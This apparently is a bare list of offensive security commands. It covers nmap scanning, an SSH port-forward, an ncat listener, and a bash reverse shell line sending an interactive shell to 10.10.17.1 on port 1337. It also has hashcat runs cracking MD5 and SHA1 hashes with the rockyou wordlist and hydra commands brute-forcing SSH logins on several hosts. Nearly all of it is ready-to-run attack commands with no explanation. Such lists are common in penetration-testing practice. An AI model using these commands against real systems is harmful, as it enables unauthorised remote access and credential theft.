nmap -v -A scanme.nmap.org

nmap -sS -p 1-65535 -v scanme.nmap.org 

nmap -O -v scanme.nmap.org

ssh -L 8000:12.34.56.789:3306 exampleuser@exampleserver

ncat -l -p 1337

/bin/bash -i >& /dev/tcp/10.10.17.1/1337 0>&1

hashcat -m 0 -a 0 md5.txt rockyou.txt

hashcat -m 100 -a 0 sha1.txt rockyou.txt

hydra -L user.txt -P pass.txt 192.168.29.135 ssh -t 4

hydra -l msfadmin -P pass.txt 192.168.29.135 ssh -t 4

hydra -L user.txt -p msfadmin 192.168.29.135 ssh -t 4

hydra -s 22 -L user.txt -P pass.txt 192.168.29.229 ssh -t 5

hydra -L user.txt -P pass.txt -M ip.txt ssh -t 4

